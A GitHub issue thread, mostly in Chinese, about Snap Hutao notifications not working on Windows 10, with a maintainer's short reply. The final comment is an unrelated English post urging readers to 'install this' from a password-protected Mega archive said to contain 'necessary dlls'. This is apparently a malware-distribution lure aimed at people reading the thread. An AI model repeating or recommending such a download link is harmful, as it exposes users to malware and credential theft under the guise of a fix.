### ISSUE TITLE
[Bug]: 通知功能失效 且 Windows 10 通知設定內找不到胡桃工具箱正式版

### ISSUE THREAD

**Issue by SSB-ARFCN** [DGP-Studio/Snap.Hutao#2009]
### 检查清单

- [X] 我已阅读 Snap Hutao 文档中的[常见问题](https://hut.ao/advanced/FAQ.html)和[常见程序异常](https://hut.ao/advanced/exceptions.html)，我的问题没有在文档中得到解答
- [X] 我知道[文档站](https://hut.ao/zh/menu.html)的导航栏中有**搜索功能**，且已经搜索过相关关键词
- [X] 我的问题不是[已完成](https://github.com/DGP-Studio/Snap.Hutao/issues?q=is%3Aopen+is%3Aissue+label%3A%E5%B7%B2%E5%AE%8C%E6%88%90)的问题也不是一个别人已发布的**重复的**问题

### Windows 版本

22H2(OS組建19045.3803)

### Snap Hutao 版本

1.11.2.0

### 设备 ID

0D9E4C3D8B75970396A895DDD0CD79E4

### 问题分类

实时便笺

### 发生了什么？

胡桃工具箱似乎未取得通知權限 當我在管理通知試圖找到胡桃工具箱並授與權限時 只有找到測試版胡桃工具箱 未找到正式版胡桃工具箱
![螢幕擷取畫面 (37)](https://github.com/user-attachments/assets/cdcc4655-f548-4a9b-bb40-8d1d40585484)
![螢幕擷取畫面 (38)](https://github.com/user-attachments/assets/30adbbc0-1379-4f5a-8eb8-0ee05c1a369d)

在#1939 中得知 Dev 有此Bug 而本次系統版本為22H2正式版 也發生了通知失效

### 你期望发生的行为？

通知能正常接收

### 最后一步

- [X] 我认为上述的描述已经足以详细，以允许开发人员能复现该问题

**Comment by Lightczx** [comment]
管理员模式不能修改通知

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme
I put the necessary dlls in the archive
